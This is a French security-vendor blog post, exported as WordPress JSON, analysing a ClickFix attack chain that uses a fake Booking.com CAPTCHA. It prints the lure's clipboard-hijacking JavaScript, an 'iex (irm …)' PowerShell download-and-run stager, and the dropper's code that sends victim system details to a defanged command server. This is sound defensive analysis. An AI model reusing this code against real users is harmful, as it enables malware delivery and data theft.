{"id":773972,"date":"2026-04-23T08:11:28","date_gmt":"2026-04-23T07:11:28","guid":{"rendered":"https:\/\/www.stormshield.com\/?p=773972"},"modified":"2026-04-23T08:11:28","modified_gmt":"2026-04-23T07:11:28","slug":"analyse-chaine-attaque-clickfix-part1","status":"publish","type":"post","link":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","title":{"rendered":"Analyse d’une cha\u00eene d’attaque de type ClickFix (partie 1)"},"content":{"rendered":"

[vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n

Pr\u00e9ambule<\/h2>\n

Dans un pr\u00e9c\u00e9dent article<\/a>, nous vous avions propos\u00e9 un aper\u00e7u global de la technique ClickFix. Une chaine d'attaque exploitant cette m\u00e9thode a \u00e9t\u00e9 d\u00e9tect\u00e9e \u00e0 la mi mars 2026 et mise en lumi\u00e8re sur\u00a0X (anciennement Twitter)<\/a>\u00a0par un\u00a0membre\u00a0de la communaut\u00e9 MalwareBazaar<\/a>, connu pour partager r\u00e9guli\u00e8rement des \u00e9chantillons de malwares. Bien que les attaquants aient chang\u00e9 les domaines utilis\u00e9s initialement,\u00a0nous proposons de d\u00e9cortiquer ensemble la cha\u00eene d'attaque compl\u00e8te.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n

Phase d'acc\u00e8s initial<\/h2>\n

App\u00e2t de la victime<\/h3>\n

La cha\u00eene d\u2019attaque ClickFix pr\u00e9sent\u00e9e ici d\u00e9bute\u00a0par une page web h\u00e9berg\u00e9e sur un domaine\u00a0contr\u00f4l\u00e9 par l\u2019attaquant. La victime y acc\u00e8de apr\u00e8s y avoir \u00e9t\u00e9\u202f\u00ab\u00a0incit\u00e9e\u00a0\u00bb, par exemple via un e-mail de\u00a0phishing ou une publicit\u00e9 malveillante.<\/p>\n

Visuel propos\u00e9<\/h3>\n

Afin de\u00a0renforcer sa cr\u00e9dibilit\u00e9, elle imite l\u2019identit\u00e9\u00a0visuelle de Booking.com\u00a0et pr\u00e9sente un faux CAPTCHA (\"Je ne suis pas un robot\").\u00a0L\u2019illustration\u00a0ci-dessous pr\u00e9sente la\u00a0page web en apparence inoffensive...\u00a0En r\u00e9alit\u00e9, un code JavaScript malveillant se cache derri\u00e8re. Notez que l'URL ne correspond pas \u00e0 booking.com\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773973\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n

Analyse du code malveillant<\/h3>\n

Le code JavaScript derri\u00e8re cette page n\u2019est pas obfusqu\u00e9, et reste donc enti\u00e8rement lisible. Plusieurs \u00e9l\u00e9ments ressortent de son analyse, notamment une gestion des erreurs explicite avec des m\u00e9canismes de fallback, ainsi qu\u2019une structure de code relativement propre.<\/p>\n

Ces caract\u00e9ristiques peuvent sugg\u00e9rer l\u2019utilisation d\u2019un kit pr\u00eat \u00e0 l\u2019emploi.<\/p>\n

Le fonctionnement du code JavaScript peut \u00eatre d\u00e9compos\u00e9 en cinq \u00e9tapes\u00a0:<\/p>\n

Initialisation et r\u00e9cup\u00e9ration de commande malveillante<\/h4>\n

Au chargement de la page, le script JS lance une requ\u00eate asynchrone vers le serveur (le m\u00eame que celui qui h\u00e9berge la page).[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773980\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]La fonction getCommandFromServer<\/code> d\u00e9marre ainsi\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]get_command<\/strong><\/code><\/p>\n

async function getCommandFromServer() {
\ntry<\/span><\/strong> {
\nconst<\/span><\/strong> response = await fetch('\/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/span>?get_command=1');
\nconst<\/span><\/strong> data = await response.json();<\/code><\/p>\n

[...]<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]On remarque la pr\u00e9sence d\u2019un seul param\u00e8tre pour l'URL (get_command=1<\/code>). Lors de nos tests, nous avons essay\u00e9 d'injecter diff\u00e9rentes valeurs \u00e0 ce param\u00e8tre comme des nombres (0, 2\u2026), des cha\u00eenes de caract\u00e8res ainsi que des valeurs vides dans le but d'obtenir des informations suppl\u00e9mentaires. Dans tous les cas, le serveur renvoie le m\u00eame contenu. Cela montre que l\u2019impl\u00e9mentation c\u00f4t\u00e9 serveur est tr\u00e8s simple\u00a0: get_command<\/code> sert surtout de d\u00e9clencheur et non \u00e0 choisir dynamiquement un payload, du moins pour l\u2019instant.<\/p>\n

Ci-dessous sont illustr\u00e9es la requ\u00eate et la r\u00e9ponse c\u00f4t\u00e9 navigateur au chargement de la page. On peut observer que le contenu retourn\u00e9, au format JSON, contient une commande PowerShell, ce qui est fortement suspect...[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773986\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_single_image image=\"773991\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]\u00c0 ce stade, la page est en cours de chargement et aucune action de l\u2019utilisateur n\u2019a encore \u00e9t\u00e9 effectu\u00e9e. La commande a \u00e9t\u00e9 r\u00e9cup\u00e9r\u00e9e et stock\u00e9e dans une variable globale pour \u00eatre utilis\u00e9e ult\u00e9rieurement.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#7CBDE4\" side_padding=\"10\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]Info<\/strong><\/span><\/p>\n

Le fait de r\u00e9cup\u00e9rer la commande de mani\u00e8re dynamique permet \u00e0 l\u2019attaquant de la modifier \u00e0 tout moment sans avoir \u00e0 changer le code c\u00f4t\u00e9 client. Cela lui offre de la flexibilit\u00e9 (changement de commande \u00e0 chaud) et complique la d\u00e9tection statique. En effet, il n'existe aucune trace directe de la commande dans le DOM ou le JavaScript, ce qui limite l\u2019efficacit\u00e9 des scanners automatis\u00e9s.<\/span>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Cette commande PowerShell, ex\u00e9cut\u00e9e par la victime lors de la derni\u00e8re \u00e9tape, utilise une technique dite fileless attack<\/em><\/a> pour t\u00e9l\u00e9charger un script PowerShell depuis le domaine wiosyrondaty[.]com<\/code> et l'ex\u00e9cuter directement en m\u00e9moire, sans \u00e9crire de fichier sur disque. Elle combine plusieurs options pour rester discr\u00e8te et contourner les restrictions.<\/p>\n

Le tableau ci-dessous r\u00e9capitule chaque option\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]

\n
\u00c9l\u00e9ment<\/strong><\/span><\/div><\/div><\/div><\/td>
Signification<\/strong><\/span><\/div><\/div><\/div><\/td>
R\u00f4le<\/strong><\/span><\/div><\/div><\/div><\/td><\/tr>
-C<\/span><\/div><\/div><\/div><\/td>
-Command<\/span><\/div><\/div><\/div><\/td>
Indique que ce qui suit est une commande \u00e0 ex\u00e9cuter directement<\/span><\/div><\/div><\/div><\/td><\/tr>
-EP B<\/span><\/div><\/div><\/div><\/td>
-ExecutionPolicy Bypass<\/span><\/div><\/div><\/div><\/td>
Contourne la politique d\u2019ex\u00e9cution locale pour autoriser le script<\/span><\/div><\/div><\/div><\/td><\/tr>
-W H<\/span><\/div><\/div><\/div><\/td>
-WindowStyle Hidden<\/span><\/div><\/div><\/div><\/td>
Ex\u00e9cute PowerShell de fa\u00e7on discr\u00e8te, sans fen\u00eatre visible<\/span><\/div><\/div><\/div><\/td><\/tr>
iex (irm wiosyrondaty[.]com)<\/span><\/div><\/div><\/div><\/td>
iex<\/strong> correspond \u00e0 la cmdlet Invoke\u2011Expression<\/strong>, ex\u00e9cute le texte re\u00e7u comme du code PowerShell, puis l\u2019alias irm<\/strong>, qui d\u00e9signe la cmdlet Invoke\u2011RestMethod<\/strong>, r\u00e9cup\u00e8re le contenu renvoy\u00e9 par le serveur.<\/span><\/div><\/div><\/div><\/td>
T\u00e9l\u00e9charge et ex\u00e9cute un script en m\u00e9moire, sans \u00e9crire sur disque (stager)<\/span><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Nous nous int\u00e9resserons plus tard au script PowerShell d\u00e9livr\u00e9.<\/p>\n

Affichage s\u00e9quentiel du leurre<\/h4>\n

Pendant la r\u00e9cup\u00e9ration de la commande, le script utilise une succession de setTimeout()<\/code> pour faire appara\u00eetre progressivement l\u2019interface du faux CAPTCHA. Cela cr\u00e9e une exp\u00e9rience r\u00e9aliste, avec des d\u00e9lais et des transitions qui incitent l\u2019utilisateur \u00e0 cliquer sur la case \u00e0 cocher. Ce code sert uniquement \u00e0 rendre l\u2019interface plus cr\u00e9dible et n\u2019a aucun caract\u00e8re malveillant.<\/p>\n

Case \u00e0 cocher et copie de la commande<\/h4>\n

\u00c0 ce stade, la page est enti\u00e8rement charg\u00e9e. L\u2019image ci-dessous montre l\u2019apparence de la page \u00e0 cet instant\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773997\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]La case \u00e0 cocher est le d\u00e9clencheur principal : lorsqu\u2019un utilisateur clique dessus, la commande stock\u00e9e dans la variable globale est automatiquement copi\u00e9e dans le presse\u2011papiers.<\/p>\n

Le code JavaScript ci\u2011dessous illustre le m\u00e9canisme utilis\u00e9 pour r\u00e9aliser cette copie automatique\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]copycmd<\/strong><\/code><\/p>\n

checkbox.addEventListener(\"click\"<\/span>, function () {
\nif<\/span><\/strong> (!command) {
\nalert('Command<\/span> not available');
\nreturn<\/strong><\/span>;
\n}<\/code><\/p>\n

console.log('Copying<\/span> command:', command);<\/code><\/p>\n

const<\/span><\/strong> textarea = document.createElement('textarea');
\ntextarea.value = command;
\ntextarea.setAttribute('readonly', '');
\ntextarea.style.position = 'absolute';
\ntextarea.style.left = '-9999px<\/span>';
\ndocument.body.appendChild(textarea);
\ntextarea.select();<\/code><\/p>\n

try<\/span><\/strong> {
\nconst<\/span><\/strong> successful = document.execCommand('copy');
\nconsole.log('Copy<\/span> command was ' + (successful ? 'successful' : 'unsuccessful'));
\n} catch<\/span><\/strong> (err) {
\nconsole.error('Failed<\/span> to<\/strong> copy<\/span>: ', err);
\n}<\/code><\/p>\n

document.body.removeChild(textarea);
\nsendTelegramNotification();<\/code><\/p>\n

});<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n

T\u00e9l\u00e9m\u00e9trie via Telegram<\/h4>\n

Juste apr\u00e8s la copie de la commande dans le presse\u2011papiers, la fonction sendTelegramNotification()<\/strong> effectue imm\u00e9diatement une requ\u00eate\u202fPOST vers l\u2019URL \/ern\u2011ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/code> du serveur de ClickFix (sur le m\u00eame domaine) et transmet les informations ci-dessous\u00a0:<\/p>\n

    \n
  • l\u2019identifiant de v\u00e9rification unique,<\/li>\n
  • le domaine courant,<\/li>\n
  • la page web d'origine (referer),<\/li>\n
  • l\u2019identification du client web (user-agent).<\/li>\n<\/ul>\n

    Ces informations permettent \u00e0 l\u2019attaquant de suivre en temps r\u00e9el les utilisateurs ayant atteint cette \u00e9tape\u00a0: elles semblent servir de t\u00e9l\u00e9m\u00e9trie.<\/p>\n

    Le code ci\u2011dessous illustre la fonction sendTelegramNotification()<\/code> et la mani\u00e8re dont elle transmet toutes ces informations\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]sendTelegram<\/strong><\/code><\/p>\n

    function sendTelegramNotification() {
    \nconst<\/span><\/strong> data = {
    \nverification_id: window.verificationId || verificationId,
    \ndomain: window.location.hostname,
    \nreferer: document.referrer,
    \nuser_agent: navigator.userAgent
    \n};<\/code><\/p>\n

    fetch('\/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/span>', {
    \nmethod: 'POST',
    \nheaders: {
    \n'Content-Type<\/span>': 'application\/json',
    \n},
    \nbody: JSON.stringify(data)
    \n})
    \n.then(response => response.json())
    \n.then(result => {
    \nconsole.log('Telegram<\/span> notification result:', result);
    \n})
    \n.catch<\/span><\/strong>(error => {
    \nconsole.error('Error<\/span> sending Telegram<\/span> notification:', error);
    \n});
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Il est int\u00e9ressant de constater que de nombreux console.log sont utilis\u00e9s (probablement des traces de debug oubli\u00e9es), ce qui permet de suivre, c\u00f4t\u00e9 navigateur, l\u2019ex\u00e9cution du code \u00e9tape par \u00e9tape. L\u2019image ci\u2011dessous illustre ces console.log<\/code> et leur encha\u00eenement\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774003\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n

    Surveillance et interception du copier-coller<\/h4>\n

    Les auteurs de ce code ont probablement pens\u00e9\u00a0: \u00ab\u00a0Et si l\u2019utilisateur copie autre chose depuis la page\u00a0?\u00a0\u00bb. Afin de s\u2019assurer que la commande malveillante soit toujours dans le presse-papiers, ils ont cr\u00e9\u00e9 une fonction qui intercepte toutes les actions de copie et remplace automatiquement le contenu du presse\u2011papiers par la commande malveillante. En clair, si vous copiez un mot ou un texte sur la page, vous copiez en r\u00e9alit\u00e9 la commande malveillante.<\/p>\n

    Nous supposons qu\u2019il s\u2019agit d\u2019une tentative de protection pour garantir que la commande soit toujours dans le presse-papiers, mais cette protection est loin d\u2019\u00eatre efficace\u00a0: il suffit de copier un texte depuis un autre onglet ou en dehors de la page pour que leur plan tombe \u00e0 l\u2019eau...<\/p>\n

    Le code ci\u2011dessous illustre cette op\u00e9ration. On peut \u00e9galement constater que la fonction est con\u00e7ue pour intercepter les copies sur tous les navigateurs,<\/strong> afin de maximiser les chances que la commande malveillante soit copi\u00e9e dans le presse\u2011papiers.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]intercepteCopy<\/strong><\/code><\/p>\n

    document.addEventListener('copy', function (e) {
    \ne.preventDefault();
    \nif<\/strong><\/span> (command) {
    \ntry<\/span><\/strong> {
    \nif<\/span><\/strong> (e.clipboardData) {
    \ne.clipboardData.setData('text\/plain', command);
    \nconsole.log('Global<\/span> copy intercepted, command set to<\/strong> clipboard<\/span>');
    \n} else if<\/strong><\/span> (window.clipboardData) {
    \nwindow.clipboardData.setData('Text', command);
    \nconsole.log('Global<\/span> copy intercepted (IE), command set to<\/strong> clipboard<\/span>');
    \n}
    \n} catch<\/span><\/strong> (err) {
    \nconsole.error('Error<\/span> in global copy handler:', err);
    \n}
    \n}
    \n});<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n

    Suivez les instructions<\/h3>\n

    \u00c0 ce stade, la victime n\u2019a plus que quelques actions \u00e0 effectuer. L\u2019image ci-dessous montre les instructions qui lui sont pr\u00e9sent\u00e9es. En suivant ces \u00e9tapes, la victime ex\u00e9cute elle-m\u00eame la commande malveillante, ce qui marque la fin de l'ing\u00e9nierie sociale et permet le t\u00e9l\u00e9chargement d\u2019un autre script, d\u00e9taill\u00e9 dans la section suivante.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774008\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n

    R\u00e9capitulatif de la phase d'acc\u00e8s initial<\/h3>\n

    La premi\u00e8re \u00e9tape de la cha\u00eene d'attaque repose enti\u00e8rement sur de l'ing\u00e9nierie sociale via une fausse interface de type CAPTCHA. Ici, aucune exploitation technique\u00a0: tout repose sur l\u2019utilisateur, qui est amen\u00e9 \u00e0 effectuer lui-m\u00eame les actions critiques.<\/strong><\/p>\n

    Entre la copie forc\u00e9e dans le presse-papiers, l\u2019interception des actions de copie et une interface cr\u00e9dible, tout est fait pour maximiser les chances que la commande malveillante soit ex\u00e9cut\u00e9e.<\/p>\n

    Au final, la commande malveillante est lanc\u00e9e par la victime elle-m\u00eame, ce qui permet de contourner assez facilement les protections classiques. Le m\u00e9canisme est simple, mais efficace.<\/p>\n

    Phase d'ex\u00e9cution<\/h2>\n

    Lors de notre premi\u00e8re analyse, nous avons suppos\u00e9 que, puisqu\u2019aucune obfuscation n\u2019\u00e9tait pr\u00e9sente dans le code JavaScript, le script t\u00e9l\u00e9charg\u00e9 n'en comporterait pas non plus. Cette hypoth\u00e8se s\u2019est av\u00e9r\u00e9e fausse.<\/p>\n

    Ci-dessous un extrait illustrant ce point\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774013\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]L\u2019analyse du code met en \u00e9vidence cinq \u00e9tapes-cl\u00e9s\u00a0: il s\u2019agit d\u2019un dropper classique, qui t\u00e9l\u00e9charge, d\u00e9ploie, met en place un m\u00e9canisme de persistance et ex\u00e9cute une autre charge depuis Internet (probablement la charge finale).<\/p>\n

    Nous allons d\u00e9sormais \u00e9tudier ensemble chacun d'entre elles.<\/p>\n

    Fingerprinting du syst\u00e8me<\/h3>\n

    Le script commence par une phase de reconnaissance du syst\u00e8me.<\/strong> Son objectif est de collecter des informations d\u00e9taill\u00e9es sur la machine de la victime afin de d\u00e9terminer l\u2019environnement dans lequel il s\u2019ex\u00e9cute. Il utilise des commandes PowerShell natives et des requ\u00eates WMI pour r\u00e9cup\u00e9rer des donn\u00e9es sur le syst\u00e8me d\u2019exploitation, le mat\u00e9riel, les comptes utilisateurs, la pr\u00e9sence d\u2019antivirus, et d\u2019autres param\u00e8tres critiques.<\/p>\n

    Ces informations sont ensuite transmises au serveur de commandes via une requ\u00eate vers une URL construite dynamiquement via la fonction ci-dessous\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]elbdfmh_zhgbspmno_bdwttqsxb_bxlhbsehf3rs2q<\/strong><\/code><\/p>\n

    function elbdfmh_zhgbspmno_bdwttqsxb_bxlhbsehf3rs2q($event, $note=\"\", $path=\"\", $file=\"\") {
    \n$url = 'https:\/\/wiosyrondaty[.]com' + '\/0<\/span>I7IRN3o4o8GefoYto39mLjnEmdxcEEK73hReyAT6-A<\/span>'
    \n$n = (Get-Random -Minimum<\/span> 1000<\/span> -Maximum<\/span> 99999<\/span>)
    \ntry<\/span><\/strong> {
    \n$getUrl = $url + '?id=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$vxflcwek_taxuk_klnlrpnujh4w1ld1eccq4c) + '&s=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$event) + '&user=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$ccnvc_jxjlbn_derwuvwayblqdg5) + '&pc=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$hcgzi_xkbejhfx3hrl9cz55jv1t2y) + '&cwd=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$path) + '&osver=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$nckk_rvcjmubkd1_kzegd9_pryqmenc) + '&osname=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$rzakz_mfgapwedtcl4l2z4tpdk) + '&pcmodel=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$psqij_wybmtargz_gieamgogg65xc36zed8) + '&pcmanuf=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$eip_nhnwzepml9wcacm7xgv08n4819ur) + '&psv=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$zwwjog_efxw_xyp8_lahb) + '&admin=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$kty5_evznwrx_wzv67xfu) + '&avinfo=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$zdqn_noxiudjz10xipuujr9nau) + '&cpu=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$wqbat6_ymbxnzy_myrwplsco_bt) + '&ram=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$ptuucgsqt8_yzawg7tubg5y0yd1vs) + '&gpu=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$hxkwtae_aajae45hujan96) + '&domain=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$ichdxegc_zanevfyp2y) + '&arch=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$zmb6_vjwgxzwh6_xfgvtqh94gnmd) + '&tz=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$rdfboyqe_mik_ikzxrxr5i1gtwow33do) + '&noise=' + $n
    \nif<\/span><\/strong> ($file -ne $null<\/strong><\/span> -and [string]$file -ne '') { $getUrl += '&exe_name=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$file) }
    \nif<\/span><\/strong> ($note -ne $null<\/strong><\/span> -and [string]$note -ne '') { $getUrl += '&msg=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$note) }
    \n$null<\/span><\/strong> = Invoke-WebRequest -Uri<\/span> $getUrl -Method<\/span> GET -UseBasicParsing -TimeoutSec<\/span> 12<\/span>
    \n} catch<\/span><\/strong> {
    \ntry<\/span><\/strong> {
    \n$m = $url + '?id=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$vxflcwek_taxuk_klnlrpnujh4w1ld1eccq4c) + '&s=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$event) + '&user=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$ccnvc_jxjlbn_derwuvwayblqdg5) + '&pc=' + [System.Uri]<\/span>::EscapeDataString<\/span>([string]$hcgzi_xkbejhfx3hrl9cz55jv1t2y) + '&noise=' + $n
    \n$null<\/span><\/strong> = Invoke-WebRequest<\/span> -Uri<\/span> $m -Method<\/span> GET -UseBasicParsing -TimeoutSec<\/span> 12<\/span>
    \n} catch<\/span><\/strong> { }
    \n}
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#7CBDE4\" side_padding=\"10\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]Si le syst\u00e8me cible ne correspond pas aux attentes (trop vieux, non pertinent, etc.), le dropper ne r\u00e9agit pas\u00a0: il ne comporte aucun m\u00e9canisme d'arr\u00eat et continue son ex\u00e9cution.<\/span>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" 